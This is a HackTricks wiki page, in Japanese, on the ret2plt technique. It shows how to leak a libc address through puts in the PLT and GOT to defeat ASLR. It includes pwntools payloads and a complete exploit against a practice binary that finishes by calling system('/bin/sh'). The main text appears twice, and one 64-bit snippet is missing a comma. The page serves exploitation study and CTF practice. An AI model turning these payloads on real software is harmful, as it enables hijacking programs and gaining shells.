Ret2plt

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

基本情報

この技術の目的は、PLTから関数のアドレスを漏洩させることでASLRをバイパスできるようにすることです。例えば、libcからputs関数のアドレスを漏洩させると、libcのベースがどこにあるかを計算し、**system**などの他の関数にアクセスするためのオフセットを計算できます。

これは、pwntoolsペイロードを使用して実行できます（こちらから）：

# 32-bit ret2plt
payload = flat(
b'A' * padding,
elf.plt['puts'],
elf.symbols['main'],
elf.got['puts']
)

# 64-bit
payload = flat(
b'A' * padding,
POP_RDI,
elf.got['puts']
elf.plt['puts'],
elf.symbols['main']
)

注意してほしいのは、puts（PLTからのアドレスを使用）がGOT（グローバルオフセットテーブル）にあるputsのアドレスで呼び出されることです。これは、putsがputsのGOTエントリを印刷する時点で、このエントリがメモリ内のputsの正確なアドレスを含むためです。

また、エクスプロイトでmainのアドレスが使用されていることにも注意してください。これにより、putsが実行を終了すると、バイナリは終了するのではなくmainを再度呼び出します（したがって、漏洩したアドレスは引き続き有効です）。

これが機能するためには、バイナリはPIEでコンパイルされていない必要があります、またはPLT、GOT、mainのアドレスを知るためにPIEをバイパスするための漏洩を見つける必要があります。そうでなければ、まずPIEをバイパスする必要があります。

このバイパスの完全な例はこちらにあります。これはその例からの最終的なエクスプロイトでした：

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvline()

payload = flat(
'A' * 32,
elf.plt['puts'],
elf.sym['main'],
elf.got['puts']
)

p.sendline(payload)

puts_leak = u32(p.recv(4))
p.recvlines(2)

libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
'A' * 32,
libc.sym['system'],
libc.sym['exit'],
next(libc.search(b'/bin/sh\x00'))
)

p.sendline(payload)

p.interactive()

他の例と参考文献

https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html
64ビット、ASLRが有効だがPIEはなし、最初のステップはオーバーフローを満たしてカナリアのバイト0x00まで到達し、その後putsを呼び出してリークすることです。カナリアを使ってROPガジェットを作成し、putsを呼び出してGOTからputsのアドレスをリークし、その後system('/bin/sh')を呼び出すROPガジェットを作成します。
https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html
64ビット、ASLRが有効、カナリアなし、子関数からのメインでのスタックオーバーフロー。ROPガジェットを使ってputsを呼び出し、GOTからputsのアドレスをリークし、その後one gadgetを呼び出します。

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousASLR NextRet2ret & Reo2pop

Last updated 1 day ago

基本情報

これは、pwntoolsペイロードを使用して実行できます（こちらから）：

# 32-bit ret2plt
payload = flat(
b'A' * padding,
elf.plt['puts'],
elf.symbols['main'],
elf.got['puts']
)

# 64-bit
payload = flat(
b'A' * padding,
POP_RDI,
elf.got['puts']
elf.plt['puts'],
elf.symbols['main']
)

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvline()

payload = flat(
'A' * 32,
elf.plt['puts'],
elf.sym['main'],
elf.got['puts']
)

p.sendline(payload)

puts_leak = u32(p.recv(4))
p.recvlines(2)

libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
'A' * 32,
libc.sym['system'],
libc.sym['exit'],
next(libc.search(b'/bin/sh\x00'))
)

p.sendline(payload)

p.interactive()

他の例と参考文献

https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html

64ビット、ASLRが有効だがPIEはなし、最初のステップはオーバーフローを満たしてカナリアのバイト0x00まで到達し、その後putsを呼び出してリークすることです。カナリアを使ってROPガジェットを作成し、putsを呼び出してGOTからputsのアドレスをリークし、その後system('/bin/sh')を呼び出すROPガジェットを作成します。

https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html

64ビット、ASLRが有効、カナリアなし、子関数からのメインでのスタックオーバーフロー。ROPガジェットを使ってputsを呼び出し、GOTからputsのアドレスをリークし、その後one gadgetを呼び出します。